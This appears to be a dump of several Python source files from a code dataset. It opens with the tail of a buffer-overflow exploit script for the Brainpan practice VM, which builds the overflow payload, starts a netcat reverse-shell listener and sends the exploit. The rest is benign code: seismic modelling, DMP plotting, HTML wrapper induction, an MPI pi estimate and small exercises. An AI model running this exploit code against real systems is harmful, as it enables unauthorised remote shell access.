PAYLOAD ... 
\")\nshellcode = ((\"\\x41\"*524)+\"\\xf3\\x12\\x17\\x31\"+(\"\\x90\"*40)+buf+(\"\\x43\"*(1024-524-4-40-len(buf))))\nsys.stdout.write(\"DONE\\n\")\nsys.stdout.write(\"- OVERFLOW: 524 Bytes\\n- JMP ESP: \\\\xf3\\\\x12\\\\x17\\\\x31\\n- NOP: 40x\\\\x90\\n- Shellcode: %d Bytes\\n- BUFFER FILL: %d\\n\\n\\n\"%(len(buf), (1024-524-4-40-len(buf))))\ntime.sleep(1.8)\nsys.stdout.write(\"SENDING EXPLOIT => \")\n\ndef netcat():\n\tos.system(\"nc -lvp \"+str(lport))\ndef exploit():\n\texploited = send(sockfd, shellcode)\n\tif exploited:\n\t\tsys.stdout.write(\"\\nExploit Complete\\n\\n\")\n\t\treturn True\n\telse:\n\t\tsys.stdout.write(\"\\nExploit Failed\\n\\n\")\n\t\treturn False\n\nexec(rev_shell)\nx = threading.Thread(target=exploit).start()\nprint('\\n')\n","sub_path":"brainpan_auto.py","file_name":"brainpan_auto.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"101104060","text":"from collections import namedtuple\n\nimport numpy\n\nfrom ._base import Base\nfrom ._eigen import EigenFunction\n\n__all__ = [\n \"RayleighEllipticity\",\n \"Ellipticity\",\n]\n\n\nRayleighEllipticity = namedtuple(\"RayleighEllipticity\", (\"period\", \"ellipticity\"))\n\n\nclass Ellipticity(Base):\n def __init__(\n self, thickness, velocity_p, velocity_s, density, algorithm=\"dunkin\", dc=0.005,\n ):\n \"\"\"\n Ellipticity class (only Rayleigh-wave).\n\n Parameters\n ----------\n thickness : array_like\n Layer thickness (in km).\n velocity_p : array_like\n Layer P-wave velocity (in km/s).\n velocity_s : array_like\n Layer S-wave velocity (in km/s).\n density : array_like\n Layer density (in g/cm3).\n algorithm : str {'dunkin', 'fast-delta'}, optional, default 'dunkin'\n Algorithm to use for computation of Rayleigh-wave dispersion:\n - 'dunkin': Dunkin's matrix (adapted from surf96),\n - 'fast-delta': fast delta matrix (after Buchen and Ben-Hador, 1996).\n dc : scalar, optional, default 0.005\n Phase velocity increment for root finding.\n\n \"\"\"\n super().__init__(thickness, velocity_p, velocity_s, density, algorithm, dc)\n\n def __call__(self, t):\n \"\"\"\n Compute Rayleigh-wave ellipticity for input period axis.\n\n Parameters\n ----------\n t : array_like\n Periods (in s).\n\n Returns\n -------\n namedtuple\n Rayleigh-wave ellipticity as a namedtuple (period, ellipticity).\n\n \"\"\"\n eigf = EigenFunction(\n self._thickness,\n self._velocity_p,\n self._velocity_s,\n self._density,\n self._algorithm,\n self._dc,\n )\n\n eigs = [eigf(tt, mode=0, wave=\"rayleigh\") for tt in t]\n ell = [eig.ur[0] / eig.uz[0] for eig in eigs]\n\n return RayleighEllipticity(t, numpy.array(ell))\n","sub_path":"disba/_ellipticity.py","file_name":"_ellipticity.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248005346","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom dmpling.dmp import DMP\n\nT = 2.0\ndt = 1e-2\na = 10\nb = a / 4\nn_bfs = 100\n\nt = np.arange(0, T, dt)\nf = 1 / T\npath2 = np.sin(2*np.pi*f*t)\npath1 = np.cos(2*np.pi*f*t)\n\n# define dmps\ndmp1 = DMP(T, dt, n_bfs=n_bfs, a=a, b=b)\ndmp1.fit(path1)\n\ndmp2 = DMP(T, dt, n_bfs=n_bfs, a=a, b=b)\ndmp2.fit(path2)\n\n# run\ny1 = np.zeros(dmp1.cs.N)\ny2 = np.zeros(dmp1.cs.N)\n\nfor i in range(dmp1.cs.N):\n y1[i], _, _, _ = dmp1.step(k=1.5)\n y2[i], _, _, _ = dmp2.step(k=1.5)\n\nplt.plot(path1, path2)\nplt.plot(y1, y2)\n\nplt.axis('equal')\nplt.xlim([path1.min()*2, 
path1.max()*2])\nplt.ylim([path2.min()*2, path2.max()*2])\nplt.show()\n\nexit()\nfor i in range(dmp1.cs.N):\n y1[i], _, _, _ = dmp1.step()\n y2[i], _, _, _ = dmp2.step()\n plt.scatter(y1[i], y2[i], c='orange')\n plt.pause(0.02)\n","sub_path":"examples/dmp_2D.py","file_name":"dmp_2D.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"145295434","text":"from RRHtmlParser import RRHtmlParser, Element\nfrom copy import deepcopy\n\n\nclass RoadRunner:\n wrapper = None\n sample = None\n sample_idx = 0\n wrapper_idx = 0\n\n def __init__(self, wrapper_path, sample_path):\n parser = RRHtmlParser()\n parser.data = []\n start = parser.last_idx + 1\n html_data = parser.preprocess_html_file(wrapper_path)\n parser.feed(html_data)\n self.wrapper = deepcopy(parser.data[start:])\n start = parser.last_idx + 1\n html_data = parser.preprocess_html_file(sample_path)\n parser.feed(html_data)\n self.sample = deepcopy(parser.data[start:])\n\n def __repr__(self):\n out = ''\n flag = False\n for el in self.wrapper:\n if el.is_square_start:\n flag = True\n elif el.is_square_end:\n flag = False\n out += str(el) + ('\\n' if not flag else ' ')\n return out\n\n def square_match(self, lower_idx, upper_idx, on_wrapper=True):\n \"\"\"\n :param lower_idx: next_terminal_idx\n :param upper_idx: terminal_idx\n :param on_wrapper: search on wrapper or sample\n :return: None or tag list\n \"\"\"\n data = self.wrapper if on_wrapper else self.sample\n square = []\n data_a = data[upper_idx + 1:lower_idx + 1] # --------\n data_a.reverse() # so zip()\n data_b = data[0:upper_idx + 1] # works\n data_b.reverse() # --------\n for lower_el, upper_el in zip(data_a, data_b):\n if lower_el == upper_el:\n square.append(lower_el)\n continue\n elif not lower_el.is_tag and not upper_el.is_tag and lower_el != upper_el:\n square.append(Element(\"#TEXT\", None, False, False))\n else:\n return None\n\n square.reverse() # Putting square elements in correct order, since We were adding it in reverse\n return square\n\n def find_square(self):\n terminal_tag = self.wrapper[self.wrapper_idx - 1]\n square = None\n w_flag = False\n\n # finding square in wrapper\n idx = self.wrapper_idx # We assume iterator continues on wrapper\n while idx < len(self.wrapper):\n if self.wrapper[idx] == terminal_tag: # We found another terminal tag on wrapper\n square = self.square_match(idx, self.wrapper_idx - 1) # We try to match square\n if square is not None:\n w_flag = True # We found it on wrapper!\n break\n idx += 1\n\n # finding square in sample\n idx = self.sample_idx # We assume iterator continues on sample\n while idx < len(self.sample) and square is None:\n if self.sample[idx] == terminal_tag: # we found another terminal tag on sample\n square = self.square_match(idx, self.sample_idx - 1, on_wrapper=False) # We try to match square\n if square is not None:\n break # We found it on sample!\n idx += 1\n\n if square is None: # We didn't find a square so it must be an optional\n return False\n\n square[0].is_square_start = True\n square[-1].is_square_end = True\n\n # finding the first and last occurence of square\n start_iterator_idx = self.wrapper_idx\n end_iterator_idx = start_iterator_idx # + len(square)\n\n while 0 <= start_iterator_idx:\n if self.wrapper[start_iterator_idx - len(square)] != square[0]:\n break\n start_iterator_idx -= len(square)\n\n while end_iterator_idx < len(self.wrapper):\n tmp_idx = end_iterator_idx + len(square) - (1 if w_flag else 0) # For any 
future questions: Just because!\n if tmp_idx >= len(self.wrapper) or self.wrapper[tmp_idx] != square[-1]:\n break\n end_iterator_idx += len(square)\n\n # removing squares from wrapper\n for i in range(start_iterator_idx, end_iterator_idx):\n self.wrapper.pop(start_iterator_idx)\n # inserting square into wrapper\n for el in square:\n self.wrapper.insert(start_iterator_idx, el)\n start_iterator_idx += 1\n # set wrapper index on the end of square iterator\n self.wrapper_idx = start_iterator_idx\n\n while True:\n tmp_idx = self.sample_idx + len(square) - 1\n if tmp_idx >= len(self.sample):\n break\n elif self.sample[tmp_idx] == terminal_tag:\n self.sample_idx += len(square)\n else:\n break\n return True\n\n def find_iterator(self):\n # prevous tags do not match, so we certainly are not on iterator\n if self.wrapper[self.wrapper_idx - 1] != self.sample[self.sample_idx - 1]:\n return False\n return self.find_square()\n\n def find_optional(self):\n wrapper_mismatch = self.wrapper[self.wrapper_idx]\n sample_mismatch = self.sample[self.sample_idx]\n w_idx = self.wrapper_idx + 1\n s_idx = self.sample_idx + 1\n\n while w_idx < len(self.wrapper) and s_idx < len(self.sample):\n if self.wrapper[w_idx] == sample_mismatch:\n for el in self.wrapper[self.wrapper_idx:w_idx]:\n el.is_optional = True\n self.wrapper_idx += 1\n return\n elif self.sample[s_idx] == wrapper_mismatch:\n for el in self.sample[self.sample_idx:s_idx]:\n el.is_optional = True\n self.wrapper.insert(self.wrapper_idx, el)\n self.wrapper_idx += 1\n self.sample_idx += 1\n return\n else:\n w_idx += 1\n s_idx += 1\n self.sample_idx += 1\n self.wrapper_idx += 1\n return\n\n def main(self):\n while self.wrapper_idx < len(self.wrapper) and self.sample_idx < len(\n self.sample): # run until the end of either the wrapper or sample\n sample_element = self.sample[self.sample_idx]\n wrapper_element = self.wrapper[self.wrapper_idx]\n\n if sample_element == wrapper_element: # check for tag mismatch, if the elements match, we continue\n self.wrapper_idx += 1\n self.sample_idx += 1 # increment indexes\n continue\n\n # elements do not match, we could have a string mismatch\n # or we have a tag mismatch, which could represent a iterator\n # or an optional element,\n\n if not sample_element.is_tag and not wrapper_element.is_tag and sample_element != wrapper_element:\n self.wrapper[self.wrapper_idx] = Element(\"#TEXT\", None, False,\n False) # Mark the element in the wrapper as a # TEXT\n\n self.wrapper_idx += 1\n self.sample_idx += 1 # increment indexes\n\n # from here on, we either stumbled upon an optional element,\n # or an iterator. 
We first check whether the element is an iterator,\n            # if it's not, it must be an optional element.\n            else:\n                result = self.find_iterator()\n                if not result:\n                    self.find_optional()\n\n\nif __name__ == '__main__':\n    # test pages\n    wrapper_path = '../input-extraction/test_pages/test_page_2.html'\n    sample_path = '../input-extraction/test_pages/test_page_1.html'\n    output_path = '../input-extraction/test_pages/wrapper12.html'\n\n    # altstore\n    # wrapper_path = '../input-extraction/altstore.si/Gaming prenosniki ASUS - AltStore.html'\n    # sample_path = '../input-extraction/altstore.si/Gaming prenosniki ACER - AltStore.html'\n    # output_path = '../input-extraction/altstore.si/wrapper12.html'\n\n    # rtv\n    wrapper_path = '../input-extraction/rtvslo.si/Audi A6 50 TDI quattro_ nemir v premijskem razredu - RTVSLO.si.html'\n    sample_path = '../input-extraction/rtvslo.si/Volvo XC 40 D4 AWD momentum_ suvereno med najboljše v razredu - RTVSLO.si.html'\n    output_path = '../input-extraction/rtvslo.si/wrapper12.html'\n\n    # overstock\n    # wrapper_path = '../input-extraction/overstock.com/jewelry01.html'\n    # sample_path = '../input-extraction/overstock.com/jewelry02.html'\n    # output_path = '../input-extraction/overstock.com/wrapper12.html'\n\n    rr = RoadRunner(wrapper_path, sample_path)\n    rr.main()\n    print(rr)\n    with open(output_path, 'w') as file:\n        file.write(str(rr))\n","sub_path":"pa2/implementation-extraction/road_runner.py","file_name":"road_runner.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"455578640","text":"from mpi4py import MPI\nfrom random import random\nimport time\n\ntimeStartTotal = time.perf_counter()\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n# Monte Carlo Pi estimation: count random points that fall inside the unit circle\ndef calPi(n):\n\tinside = 0\n\tfor i in range(n):\n\t\tx = random()\n\t\ty = random()\n\t\tif x**2 + y**2 <= 1:\n\t\t\tinside += 1\n\treturn(inside)\n\n#Master\nif rank == 0:\n\t# Pi Calculation\n\trangeNumber = 10**8\n\t# print('This is rank 0 sending %s as range to slaves for calculation' %(rangeNumber))\n\tcomm.send(rangeNumber,dest=1,tag=11)\n\tcomm.send(rangeNumber,dest=2,tag=11)\n\tinside1 = comm.recv(source=1, tag=11)\n\tinside2 = comm.recv(source=2, tag=11)\n\tprint('# from rank 1:',inside1)\n\tprint('# from rank 2:',inside2)\n\tpi = 4*(inside1+inside2)/(rangeNumber*2)\n\tprint(\"Calculated Pi: \",pi)\n\n\t#Time Calculation\n\ttimeEnd1 = comm.recv(source=1, tag=12)\n\tprint('Time to process for rank1: ',timeEnd1)\n\ttimeEnd2 = comm.recv(source=2, tag=12)\n\tprint('Time to process for rank2:',timeEnd2)\n\tprint('Average time for each process:',(timeEnd1+timeEnd2)/2)\n\ttimeEndTotal = (time.perf_counter() - timeStartTotal)\n\tprint('Total time to process:',timeEndTotal)\n\n#Slave 1\nif rank == 1:\n\ttimeStart1 = MPI.Wtime()\n\tdata = comm.recv(source=0,tag=11)\n\tinside1 = calPi(data)\n\tcomm.send(inside1, dest=0, tag=11)\n\ttimeEnd1 = MPI.Wtime() - timeStart1\n\tprint('1',timeEnd1)\n\tcomm.send(timeEnd1, dest=0, tag=12)\t\n\t# print('This is rank 1 & got this range to calculate Pi from rank 0: ', data)\n\n#Slave 2\nif rank == 2:\n\ttimeStart2 = MPI.Wtime()\n\tdata = comm.recv(source=0, tag=11)\n\tinside2 = calPi(data)\n\tcomm.send(inside2, dest=0, tag=11)\n\ttimeEnd2 = MPI.Wtime() - timeStart2\n\tprint(timeEnd2)\n\tcomm.send(timeEnd2, dest=0, tag=12)\t\n\t# print('This is rank 2 & got this range to calculate Pi from rank 0: ',
data)\n","sub_path":"mpi.py","file_name":"mpi.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7225647","text":"import sys\nimport traceback\n\n\ndef is_overridden_func(func):\n # https://stackoverflow.com/questions/9436681/how-to-detect-method-overloading-in-subclasses-in-python\n obj = func.__self__\n base_class = getattr(super(type(obj), obj), func.__name__)\n return func.__func__ != base_class.__func__\n\n\ndef extract_detail():\n \"\"\"Extracts failing function name from Traceback\n by Alex Martelli\n http://stackoverflow.com/questions/2380073/how-to-identify-what-function-call-raise-an-exception-in-python\n \"\"\"\n tb = sys.exc_info()[-1]\n stk = traceback.extract_tb(tb, -1)[0]\n return \"{} in {} line num {} on line {} \".format(\n stk.name, stk.filename, stk.lineno, stk.line\n )\n\n\ndef get_details(fn):\n class_name = vars(sys.modules[fn.__module__])[\n fn.__qualname__.split(\".\")[0]\n ].__name__\n fn_name = fn.__name__\n if class_name == fn_name:\n return None, fn_name\n else:\n return class_name, fn_name\n","sub_path":"utils/function_util.py","file_name":"function_util.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232621334","text":"from sys import maxsize\n\nclass Solution:\n minScoreDict = {}\n\n def minScoreTriangulation(self, A):\n if tuple(A) in self.minScoreDict:\n return self.minScoreDict[tuple(A)]\n elif len(A) == 3:\n return A[0] * A[1] * A[2]\n elif len(A) < 3:\n raise Exception(\"too few vertices\")\n else:\n minVal = maxsize\n lenA = len(A)\n if lenA == 4:\n lenA = 2\n for i in range(0, lenA):\n totalSum = A[i]*A[(i+1)%len(A)]*A[(i+2)%len(A)]\n A_subset = A[:]\n A_subset.pop((i+1)%len(A_subset))\n totalSum += self.minScoreTriangulation(A_subset)\n minVal = min(minVal, totalSum)\n self.minScoreDict[tuple(A)] = minVal\n return minVal\n\n #WRONG\n '''\n def minScoreTriangulationBruteForce(self, A):\n if len(A) == 3:\n return A[0] * A[1] * A[2]\n elif len(A) < 3:\n raise Exception(\"too few vertices\")\n else:\n minVal = maxsize\n for i in range(0, len(A)):\n print(\"{0}, {1}, {2}, {3}\".format(A[i], A[(i+1)%len(A)], A[(i+2)%len(A)], A[i] * A[(i+1)%len(A)] *A[(i+2)%len(A)]))\n totalSum = A[i] * A[(i+1)%len(A)] * A[(i+2)%len(A)]\n for j in range(0, len(A)-3):\n print(\"{0}, {1}, {2}, {3}\".format(A[i], A[(i+j+2)%len(A)], A[(i+j+3)%len(A)], A[i] * A[(i+j+2)%len(A)] * A[(i+j+3)%len(A)]))\n totalSum += (A[i] * A[(i+j+2)%len(A)] * A[(i+j+3)%len(A)])\n minVal = min(minVal, totalSum)\n print(\"total Sum - {0}\".format(totalSum))\n return minVal\n '''\n \nsol = Solution()\n#print(sol.minScoreTriangulation([10,6,8,5,4]))\n#print(sol.minScoreTriangulation([1,3,1,4,1,5]))\nprint(sol.minScoreTriangulation([38,76,69,32,24,35,82,30,86,77,92,3,35,20,84,67,23,58,94,10]))","sub_path":"minScoreTriangulation.py","file_name":"minScoreTriangulation.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384488143","text":"import itertools as it\n\nimport numpy as np\nfrom Bio import SeqIO\n\n\ndef extract_kmer_frequencies(input, output, k, characters='nuc'):\n k = int(k)\n if characters == 'nuc':\n characters = 'AGCT'\n else:\n characters = 'ACDEFGHIKLMNPQRSTVWY'\n N = len(characters)**k\n kmer_tuples = it.product(characters, repeat=k)\n kmer_to_index = { ''.join(kmer): index for index, kmer in 
enumerate(kmer_tuples) }\n    output_file = open(output, 'w')\n    kmers = [''.join(kmer) for kmer in it.product(characters, repeat=k)]\n    output_file.write(','.join(['header']+kmers))\n\n    records = SeqIO.parse(input, 'fasta')\n    bins = np.arange(N+1)\n    for record in records:\n        ungapped_string = str(record.seq.ungap('-'))\n        current_kmers = [ungapped_string[i:i+k] for i in range(len(ungapped_string)-k+1)]\n        indices = [kmer_to_index[kmer] for kmer in current_kmers if kmer in kmer_to_index]\n        kmer_counts, _ = np.histogram(indices, bins=bins)\n        output_file.write('\\n'+record.name+',')\n        output_file.write(','.join([str(i) for i in kmer_counts]))\n\n","sub_path":"src/extract_kmer_frequencies.py","file_name":"extract_kmer_frequencies.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"394137306","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 20 11:06:07 2020\r\n\r\n@author: rjsem\r\n\"\"\"\r\n\r\n# Program to read a video\r\n# and extract its frames\r\nimport cv2\r\n\r\n# Function to extract frames\r\ndef FrameCapture(path):\r\n\r\n    # Path to video file\r\n    vidObj = cv2.VideoCapture(path)\r\n\r\n    # Used as counter variable\r\n    count = 0\r\n\r\n    # Tracks whether a frame was read successfully\r\n    success = 1\r\n\r\n    while success:\r\n\r\n        # vidObj.read() grabs the next frame\r\n        success, image = vidObj.read()\r\n\r\n        # Stop once no more frames can be read\r\n        if success != 1: break\r\n\r\n        # Save the frame, named with its frame count\r\n        cv2.imwrite(\"frame%d.jpg\" % count, image)\r\n\r\n        count += 1\r\n\r\n    vidObj.release()\r\n    cv2.destroyAllWindows()\r\n# Driver Code\r\nif __name__ == '__main__':\r\n\r\n    # Calling the function\r\n    FrameCapture(\"C:\\\\Users\\\\rjsem\\\\Desktop\\\\Popeye\\\\Popeye.mp4\")\r\n","sub_path":"video_prep/VidToFrameImgs.py","file_name":"VidToFrameImgs.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"82256932","text":"# -*- coding: utf-8 -*-\nimport collections\nimport itertools\nimport sys\n\n\nclass Namespace(object):\n    __slots__ = ['_dict']\n\n    def __init__(self, values=None):\n        self._dict = {}\n        if values:\n            self._dict.update(values)\n\n    def __contains__(self, k):\n        return k in self._dict\n\n\n    def __getitem__(self, k):\n        return self._dict[k]\n\n    def __setitem__(self, k, v):\n        self._dict[k] = v\n\n    def __getattr__(self, k):\n        try:\n            return self._dict[k]\n        except KeyError:\n            try:\n                return getattr(self._dict, k)\n            except:\n                raise\n            # print \"DEBUG: unknown identifier:\", k\n            # print \"DEBUG: known identifiers:\", self._dict.keys ( )\n            # return 'Unknown identifier:%s' % k\n\n\ndef quoteattrs(attrs):\n    \"\"\"\n    Escape and quote a dict of attribute/value pairs.\n\n    Escape &, <, and > in a string of data, then quote it for use as\n    an attribute value.
The \" character will be escaped as well.\n Also filter out None values.\n \"\"\"\n quoted = []\n for a, v in attrs.items():\n if v is None:\n continue\n if not isinstance(v, str):\n v = str(v, 'utf-8')\n\n v = u'\"' + v.replace(u\"&\", u\"&\"\n ).replace(u\">\", u\">\"\n ).replace(u\"<\", u\"<\"\n ).replace(u'\"', u\""\") + u'\"'\n quoted.append(u' %s=%s' % (a, v))\n return quoted\n\n\ndef escape(s):\n \"\"\"\n Escape &, <, and > in a string of data.\n \"\"\"\n return s.replace(\"&\", \"&\"\n ).replace(\">\", \">\"\n ).replace(\"<\", \"<\")\n\n\ndef caller():\n \"\"\"\n get the execution frame of the caller\n \"\"\"\n return sys._getframe(2)\n\n\nclass PrettyPrinter(object):\n \"\"\"not happy with this - should happen at the flattener level\"\"\"\n\n def __init__(self, indent=2):\n self.indent = indent\n self.current_indent = -indent\n self.output = []\n\n def start_element(self, name, attrs):\n self.current_indent += self.indent\n padding = ' ' * self.current_indent\n if attrs:\n self.output.append(\n padding +\n \"<%s%s>\" % (name, ''.join(quoteattrs(attrs)))\n )\n else:\n self.output.append(padding + \"<%s>\" % name)\n\n def end_element(self, name):\n padding = ' ' * self.current_indent\n self.output.append(padding + \"\" % name)\n self.current_indent -= self.indent\n\n def char_data(self, data):\n padding = ' ' * (self.current_indent + self.indent)\n self.output.append(padding + data)\n\n def parse(self, xmldata):\n from xml.parsers.expat import ParserCreate # @UnresolvedImport\n\n p = ParserCreate('utf-8')\n p.StartElementHandler = self.start_element\n p.EndElementHandler = self.end_element\n p.CharacterDataHandler = self.char_data\n p.Parse(xmldata)\n return '\\n'.join(self.output)\n\n\n\ndef izip_flat_pairs(pairs, fillvalue=None):\n it = iter(pairs)\n return itertools.zip_longest(it, it, fillvalue=fillvalue)\n\n\nclass odict(collections.OrderedDict):\n def __init__(self, *args, **kwds):\n \"\"\"\n Initialize an ordered dictionary. The signature is almost the same as regular dictionaries,\n but keyword arguments are not recommended because their insertion order is arbitrary.\n\n And additional:\n * If an even number of args is given, they are used as flat key value pairs.\n * Borrowed adict functionality for names without \"__\" in front\n\n \"\"\"\n if len(args) > 1:\n if len(args) % 2 != 0:\n raise TypeError('expected one or an even number of args, got %d' % len(args))\n args = izip_flat_pairs(args),\n super().__init__(*args, **kwds)\n\n def update(*args, **kwds): # @NoSelf\n ''' D.update([E, ]**F) -> None. 
Update D from mapping/iterable E and F.\n        If E present and has a .keys() method, does: for k in E: D[k] = E[k]\n        If E present and lacks .keys() method, does: for (k, v) in E: D[k] = v\n        In either case, this is followed by: for k, v in F.items(): D[k] = v\n        '''\n        if not args:\n            raise TypeError(\"descriptor 'update' of 'MutableMapping' object \"\n                            \"needs an argument\")\n        self, *args = args\n        if len(args) > 1:\n            if len(args) % 2 != 0:\n                raise TypeError('expected one or an even number of args, got %d' % len(args))\n            args = izip_flat_pairs(args),\n        if args:\n            other = args[0]\n            if isinstance(other, collections.abc.Mapping):\n                for key in other:\n                    self[key] = other[key]\n            elif hasattr(other, \"keys\"):\n                for key in other.keys():\n                    self[key] = other[key]\n            else:\n                for key, value in other:\n                    self[key] = value\n        for key, value in kwds.items():\n            self[key] = value\n\n    def __getattr__(self, name):\n        if name.startswith('__'):\n            return super(odict, self).__getattribute__(name)\n        try:\n            return self[name]\n        except KeyError:\n            raise self.__attr_error(name)\n\n    def __setattr__(self, name, value):\n        if name.startswith('_'):\n            super(odict, self).__setattr__(name, value)\n        else:\n            self[name] = value\n\n    def __delattr__(self, name):\n        if name.startswith('_'):\n            super(odict, self).__delattr__(name)\n            return\n        try:\n            del self[name]\n        except KeyError:\n            raise self.__attr_error(name)\n\n    def __attr_error(self, name):\n        return AttributeError(\"type object '{subclass_name}' has no attribute '{attr_name}'\"\n                              .format(subclass_name=type(self).__name__, attr_name=name))\n\n    def copy(self):\n        return odict(dict.copy(self))\n","sub_path":"breve/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"16820439","text":"#1\n\nimport math\nn = int(input(\"Enter a number: \"))\nprint(math.factorial(n))\n\n#2\n\ndef function(n):\n    if n == 0:\n        return 0\n    elif n == 1:\n        return 3\n    elif n == 2:\n        return 5\n    elif n > 2:\n        return(function(n-1) + function(n-2) + function(n-3))\nfor n in range(16):\n    print(function(n))\n\n#3\n\nx = int(input(\"Enter the triangle height:\"))\ny = 0\nwhile x > y:\n    print(y * \"◘\")\n    y += 1\nwhile y >= 1:\n    print(y * \"◘\")\n    y -= 1\nif x == 0:\n    print(\"A triangle with a height of zero does not exist\")\n\n#4\n\nimport math\nx = int(input(\"First number: \"))\ny = int(input(\"Second number: \"))\ndef _gcd(x, y):\n    return math.gcd(x, y)\n\nprint(_gcd(x, y))\n\n#5\n\nimport math\nx = int(input(\"First number: \"))\ny = int(input(\"Second number: \"))\ndef _lcm(x, y):\n    # math.lcm is available in Python 3.9+\n    return math.lcm(x, y)\n\nprint(_lcm(x, y))\n","sub_path":"_10_02_21.py","file_name":"_10_02_21.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"218321575","text":"# Method 1\n'''\ndef romanToInt1(s):\n    result = 0\n    curr = 0\n    pre = 0\n    for i in range(len(s)):\n        if s[i] == 'I':\n            curr = 1\n        elif s[i] == 'V':\n            curr = 5\n        elif s[i] == 'X':\n            curr = 10\n        elif s[i] == 'L':\n            curr = 50\n        elif s[i] == 'C':\n            curr = 100\n        elif s[i] == 'D':\n            curr = 500\n        elif s[i] == 'M':\n            curr = 1000\n\n        result = result + curr\n\n        if (pre < curr):\n            result = result - 2 * pre\n        pre = curr\n\n    return result\n'''\n# Method 2\ndef romanToInt1(s):\n    d = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n    result = 0\n\n    for i in range(len(s)-1):\n        if d[s[i]] < d[s[i+1]]:\n            result-= d[s[i]]\n        else:\n            result+=d[s[i]]\n\n    result+=d[s[len(s)-1]]\n    return result
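\n\n# Quick illustrative check (added, not part of the original file):\n# romanToInt1('MCMXCIV') should return 1994, since M=1000, CM=900, XC=90, IV=4.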
\n","sub_path":"13. 罗马数字转整数.py","file_name":"13. 罗马数字转整数.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"150159474","text":"# problemName = \"Largest prime factor\"\n# problemNum = 3\n# solutionBy = \"FIGBERT\"\n# language = \"Python\"\n# dateCompleted = \"21/01/2020\"\nimport math\n\ndef prime_factors(num):\n    primes = []\n    factor_limit = int(math.sqrt(num)) + 1\n    while num % 2 == 0:\n        primes.append(2)\n        num = num // 2\n    for i in range(3, factor_limit, 2):\n        while num % i == 0:\n            primes.append(i)\n            num = num // i\n    if num > 2:\n        primes.append(num)\n    return primes\n\nif __name__ == \"__main__\":\n    answer = max(prime_factors(600851475143))\n    print(\n        \"The largest prime factor of the number 600851475143 is %s\" % answer\n    )\n","sub_path":"problem003.py","file_name":"problem003.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"116251571","text":"import codecs\nimport os\nimport random\nimport shutil\n\n\ninput_dir = ''\ntrain_dir = ''\nval_dir = ''\n\nif not os.path.exists(train_dir):\n    os.mkdir(train_dir)\nif not os.path.exists(val_dir):\n    os.mkdir(val_dir)\nimg_files = os.listdir(input_dir)\nrandom.shuffle(img_files)\n\nall_num = len(img_files)\nprint(all_num)\ntrain_img = img_files[:int(0.8 * all_num)]\n\nval_img = img_files[int(0.8 * all_num):]\n\nfor img_file in train_img:\n    if not img_file.endswith('g'):\n        continue\n    shutil.copy(os.path.join(input_dir, img_file), train_dir)\nfor img_file in val_img:\n    if not img_file.endswith('g'):\n        continue\n    shutil.copy(os.path.join(input_dir, img_file), val_dir)\n","sub_path":"split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"502867962","text":"import re\n\nVOWELS = 'aeiou'\nCONSONANTS = 'bcdfghjklmnpqrstvwxyz'\nWORDLIST_FILENAME = \"words.txt\"\nSCRABBLE_LETTER_VALUES = {\n    'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1, 's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10\n}\n\n\ndef letter_score(letter):\n    return SCRABBLE_LETTER_VALUES.get(letter, 0)\n\n#\n# Problem #1: Scoring a word\n#\n\n\ndef get_word_score(word, n):\n    \"\"\"\n    Returns the score for a word. Assumes the word is a\n    valid word.\n\n    You may assume that the input word is always either a string of letters,\n    or the empty string \"\". You may not assume that the string will only contain\n    lowercase letters, so you will have to handle uppercase and mixed case strings\n    appropriately.
